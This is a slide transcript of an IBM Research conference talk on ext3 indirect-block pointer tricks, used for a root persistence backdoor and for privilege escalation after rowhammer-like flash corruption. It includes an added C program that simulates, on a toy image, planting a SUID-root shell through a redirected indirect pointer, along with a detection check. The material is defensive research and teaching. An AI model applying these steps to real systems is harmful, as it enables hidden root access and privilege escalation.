Anıl Kurmuş, PacSec slide transcript

Posted on 22-Jan-2018


A filesystem attack vector for backdoors, rowhammer-like attacks, and more.

Anil Kurmus
with Nikolas Ioannou, Matthias Neugschwandtner, Nikolaos Papandreou and Thomas Parnell

IBM Research - Zurich

This talk
Introduces filesystem tricks that can be used in two attack scenarios (on ext3):
1. Persistence without tampering with binaries/config
2. Privilege escalation assuming rowhammer-like attacks on storage media

Outline
1. Indirect block manipulation on ext3
2. Persistence backdoor
3. Privesc for rowhammer-like attacks

Primer on ext3
... and similar indirect-block-based filesystems

Inodes
An ext3 inode holds a file's metadata (mode, owner, size, ...) and an array of block numbers: 12 direct pointers, then one single-, one double- and one triple-indirect pointer.

Indirect blocks
An indirect block is an ordinary filesystem block filled with block numbers; everything past the 12th block of a file is reached by following pointers that live on disk.

Indirect block manipulation
It's a pointer... we can and should corrupt it!

Application #1

Persistence backdoor
Implant a backdoor to persist root access across reboots without modifying system files, binaries, or config files.

Threat model
Assume the attacker has raw disk access (root access).

Idea
- Create a "backdoor" file
- Update its inode: a pointer in its indirect block is made to point at an inode-table block
- Persistence achieved!

On reboot
- Write into the "backdoor" file at the offset that maps through that pointer
- The write updates the inode of another file: for example, a shell
- Get root by creating a SUID-root shell
- Done!

Live demo

Application #2

Flash primer

Flash weaknesses
- Program/erase wear
- Charge loss over time
- Cell-to-cell interference
- Read disturb
All were demonstrated and characterized.

Cell-to-cell interference

Mitigations
- Scrambler
- Block allocation / wear leveling
- Error-correcting codes (ECC)
Implemented in SSDs.

Flash storage layers
1. Flash chip
2. Flash controller
3. SSD controller
4. OS (filesystem/driver)
5. User

A path to rowhammer-like attacks on flash
1. Flash chip: cell-to-cell interference.
2. Flash controller: scrambler and ECC bypass.
3. SSD controller: wear leveling and block placement algorithm.
4. OS: filesystem caching and error detection bypass.
5. User: privilege escalation payload.

Prior work
Covers layer 1 (cell-to-cell interference) and the scrambler in layer 2 (the items bracketed on the original slide).

Our WOOT paper
Covers the OS and user layers (4 and 5): the filesystem part of the chain.

Flash ECC
- Long codewords (e.g., >1KB)
- High correction capability (e.g., >50 bits)

(figure: codewords)

Extremely difficult to get a controlled corruption past this!

The filesystem attack
Assumes:
- Attacker can corrupt a chosen block
- ... with random contents (the weaker assumption)
- ext3 filesystem

Filesystem attack
Main idea:
- Cause corruption of an indirect block
- Good chance one of its pointers then points into the inode table
- Overwrite an inode through that pointer to set the SUID bit with root ownership
- Elevate by executing the SUID-root shell

(figures: inodes and indirect blocks; indirect block corruption; overwriting inode entries)
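The pointer trick behind both Application #1 (the persistence backdoor) and the corruption attack above, as an added example that is not the talk's demo code: a toy in-memory ext2/ext3-style image with the standard logical-to-physical block mapping. `plant_suid_via_indirect` aims one pointer of the backdoor file's indirect block at the inode-table block that holds the target inode, reads that block back through the file so the neighbouring inodes stay intact, sets the SUID bit and root ownership on the target, and writes the block back through the same file. `count_pointers_into_itable` is the matching detection check. Block size, inode-table location, inode numbers and the pointer index are assumptions chosen for the toy image, not values from the talk.

```c
/* Toy in-memory model of the ext2/ext3 block-mapping scheme. Added example, not
 * the talk's demo code; all layout constants are assumptions for this toy image
 * (a real attacker reads them from the superblock and group descriptors). */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BLOCK_SIZE     1024
#define NBLOCKS        64
#define PTRS_PER_BLK   (BLOCK_SIZE / 4)          /* block numbers per indirect block */
#define INODE_SIZE     128
#define INODES_PER_BLK (BLOCK_SIZE / INODE_SIZE)
#define ITABLE_START   4                         /* inode table = blocks 4..7 (assumed) */
#define ITABLE_BLKS    4
#define NDIRECT        12
#define EXT2_SUID      04000

/* Subset of struct ext2_inode: i_mode/i_uid first, i_block[] at offset 40 */
struct inode {
    uint16_t i_mode, i_uid;
    uint32_t i_size;
    uint8_t  pad1[32];     /* timestamps, gid, links, blocks, flags, osd1 */
    uint32_t i_block[15];  /* 12 direct, then single/double/triple indirect */
    uint8_t  pad2[28];
};

static uint32_t disk[NBLOCKS][PTRS_PER_BLK];     /* the "device", 4-byte aligned */

static struct inode *get_inode(uint32_t ino) {   /* inode numbers start at 1 */
    uint32_t idx = ino - 1;
    return (struct inode *)((uint8_t *)disk[ITABLE_START + idx / INODES_PER_BLK] +
                            (idx % INODES_PER_BLK) * INODE_SIZE);
}

/* ext2 logical->physical mapping for the direct and single-indirect ranges
 * (double/triple indirect omitted). Returns 0 for an unmapped block. */
static uint32_t map_block(const struct inode *in, uint32_t lblk) {
    if (lblk < NDIRECT) return in->i_block[lblk];
    lblk -= NDIRECT;
    uint32_t ind = in->i_block[12];
    if (lblk >= PTRS_PER_BLK || !ind || ind >= NBLOCKS) return 0;
    return disk[ind][lblk];
}

/* Ordinary block-granular file I/O through the mapping: the filesystem trusts
 * whatever block number the pointer chain yields. */
static int file_io(const struct inode *in, uint32_t lblk, uint32_t *buf, int write) {
    uint32_t pblk = map_block(in, lblk);
    if (!pblk || pblk >= NBLOCKS) return -1;
    if (write) memcpy(disk[pblk], buf, BLOCK_SIZE);
    else       memcpy(buf, disk[pblk], BLOCK_SIZE);
    return 0;
}

/* Constructed image: inode 2 stands in for /bin/sh (root, 0755); inode 9 is
 * the attacker's "backdoor" file whose single-indirect block is block 30. */
static void build_image(void) {
    memset(disk, 0, sizeof disk);
    struct inode *sh = get_inode(2), *bd = get_inode(9);
    sh->i_mode = 0100755; sh->i_uid = 0;    sh->i_block[0] = 20;
    bd->i_mode = 0100644; bd->i_uid = 1000; bd->i_block[12] = 30;
}

/* The trick shared by the persistence backdoor and the corruption attack: one
 * pointer in the backdoor file's indirect block refers to the inode-table block
 * holding the target inode (planted here; in the rowhammer-like case a corrupted
 * pointer lands there by chance). File I/O on that logical block now hits the table. */
static int plant_suid_via_indirect(uint32_t bd_ino, uint32_t target_ino) {
    struct inode *bd = get_inode(bd_ino);
    uint32_t ind = bd->i_block[12], buf[PTRS_PER_BLK];
    if (!ind || ind >= NBLOCKS) return -1;
    disk[ind][5] = ITABLE_START + (target_ino - 1) / INODES_PER_BLK;
    if (file_io(bd, NDIRECT + 5, buf, 0)) return -1;         /* keep neighbouring inodes */
    struct inode *t = (struct inode *)((uint8_t *)buf +
                                       ((target_ino - 1) % INODES_PER_BLK) * INODE_SIZE);
    t->i_mode |= EXT2_SUID;
    t->i_uid = 0;
    return file_io(bd, NDIRECT + 5, buf, 1);
}

/* Detection counterpart (the idea behind e2fsck's illegal-block test): a
 * regular file's data pointers must never land inside the inode table. */
static int count_pointers_into_itable(const struct inode *in) {
    int bad = 0;
    for (uint32_t l = 0; l < NDIRECT + PTRS_PER_BLK; l++) {
        uint32_t p = map_block(in, l);
        if (p >= ITABLE_START && p < ITABLE_START + ITABLE_BLKS) bad++;
    }
    return bad;
}

int main(void) {
    build_image();
    int rc = plant_suid_via_indirect(9, 2);
    printf("rc=%d, inode 2 mode now %o, pointers from inode 9 into inode table: %d\n",
           rc, (unsigned)get_inode(2)->i_mode, count_pointers_into_itable(get_inode(9)));
    return rc;
}
```

Two points worth noticing. First, the read-before-write is not optional: the write replaces a whole inode-table block, so without copying the current contents through the same pointer every other inode in that block would be wiped. Second, the check in `count_pointers_into_itable` is exactly what an integrity mechanism has to do on every mapping rather than at fsck time; the ZFS mitigation the slides mention works one step earlier still, since a corrupted indirect block fails the checksum stored in its parent block pointer before any pointer in it is followed.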

Attack demohttps://www.youtube.com/watch?v=Mnzp1p9Nvw0

Improved attack
- Uses the double indirect block instead
- Achieves full filesystem read/write
- 99% success

Limitations & Mitigations
- Unclear whether applicable beyond ext3
- Data integrity checks prevent the attack (ZFS)
- More in the paper

Conclusion 1/2
- Random corruption of a chosen block implies privilege escalation with high probability on ext3
- There is a path to rowhammer-like attacks on SSDs, but none demonstrated yet
- This is one piece of the puzzle: the filesystem part

Conclusion 2/2
The technique is nevertheless applicable in other domains:
- Persistence without modifying binaries/config files
- Active attacks against XTS encryption? (future work!)

We can do neat attacks by manipulating fs pointers!
